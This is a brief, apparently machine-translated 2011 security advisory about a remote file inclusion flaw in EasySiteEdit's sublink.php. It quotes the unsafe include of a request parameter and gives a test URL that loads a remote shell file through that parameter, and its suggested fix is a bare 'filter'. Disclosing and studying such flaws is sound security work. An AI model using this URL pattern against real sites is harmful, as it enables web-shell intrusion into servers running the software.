EasySiteEdit the remote file containing the defect and repair-vulnerability warning-the black bar safety net

2011-08-25T00:00:00
ID MYHACK58:62201131686
Type myhack58
Reporter 佚名
Modified 2011-08-25T00:00:00

Description

EasySiteEdit the remote file containing the defect and repair

Exploit Title: EasySiteEdit remote file include Author:koskesh jakesh Download address: <http://www.easysiteedit.com/licensesystem/esev2versions/esev2.zip>

Tested on: linux

------------------------------- vul:sublink.php line 2 0: include($_REQUEST['langval']); ------------------------------- Test: www.badguest.cn /path/sublink.php?langval=shell.txt?

Fix: filter